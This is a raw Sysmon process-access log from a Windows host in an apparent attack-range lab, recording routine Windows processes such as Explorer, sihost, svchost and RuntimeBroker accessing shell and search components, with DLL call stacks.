13:30:11.389{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011432Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.389{08A6967A-4753-6000-0E05-000000009A01}23362216C:\Windows\system32\sihost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+6375|C:\Windows\System32\twinui.appcore.dll+470d|C:\Windows\System32\twinui.appcore.dll+3e1e|C:\Windows\system32\activationmanager.dll+79e9|C:\Windows\system32\activationmanager.dll+ac47|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011431Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.389{08A6967A-4753-6000-0E05-000000009A01}23362216C:\Windows\system32\sihost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+590b|C:\Windows\System32\twinui.appcore.dll+470d|C:\Windows\System32\twinui.appcore.dll+3e1e|C:\Windows\system32\activationmanager.dll+79e9|C:\Windows\system32\activationmanager.dll+ac47|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011430Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.389{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011429Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.389{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011428Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.389{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+625f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5dfa|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5ea2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5ff5|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e 10341000x800000000000000011427Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.389{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ac73|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c499|C:\Windows\System32\TwinUI.dll+f42ac|C:\Windows\System32\TwinUI.dll+f440a|C:\Windows\System32\TwinUI.dll+f4cc3|C:\Windows\System32\TwinUI.dll+f4d62|C:\Windows\System32\TwinUI.dll+154f93|C:\Windows\System32\TwinUI.dll+155ab3|C:\Windows\System32\TwinUI.dll+1565f7|C:\Windows\System32\TwinUI.dll+14880b|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011426Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.389{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f42ac|C:\Windows\System32\TwinUI.dll+f440a|C:\Windows\System32\TwinUI.dll+f4cc3|C:\Windows\System32\TwinUI.dll+f4d62|C:\Windows\System32\TwinUI.dll+154f93|C:\Windows\System32\TwinUI.dll+155ab3|C:\Windows\System32\TwinUI.dll+1565f7|C:\Windows\System32\TwinUI.dll+14880b|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011425Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.389{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f42ac|C:\Windows\System32\TwinUI.dll+f440a|C:\Windows\System32\TwinUI.dll+f4cc3|C:\Windows\System32\TwinUI.dll+f4d62|C:\Windows\System32\TwinUI.dll+154f93|C:\Windows\System32\TwinUI.dll+155ab3|C:\Windows\System32\TwinUI.dll+1565f7|C:\Windows\System32\TwinUI.dll+14880b|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011424Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.389{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+141c7c|C:\Windows\System32\TwinUI.dll+e7804|C:\Windows\System32\TwinUI.dll+e28fb|C:\Windows\System32\TwinUI.dll+1487f6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011423Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.389{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011422Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.389{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011421Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.389{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011420Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.389{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011419Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.373{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011418Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.373{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011417Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.373{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\execmodelclient.dll+ff86|C:\Windows\System32\execmodelclient.dll+fe2c|C:\Windows\System32\execmodelclient.dll+1e7d9|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+5086c|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011416Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.373{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\execmodelclient.dll+ff86|C:\Windows\System32\execmodelclient.dll+fea8|C:\Windows\System32\execmodelclient.dll+1e7bb|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+5086c|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011415Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011414Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011413Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.373{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\execmodelclient.dll+79be|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011412Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.373{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\execmodelclient.dll+791a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011411Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+18a6c|C:\Windows\SYSTEM32\psmserviceexthost.dll+e44e|C:\Windows\SYSTEM32\psmserviceexthost.dll+e4e7|C:\Windows\SYSTEM32\psmserviceexthost.dll+e1f2|C:\Windows\SYSTEM32\psmserviceexthost.dll+18e38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011410Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 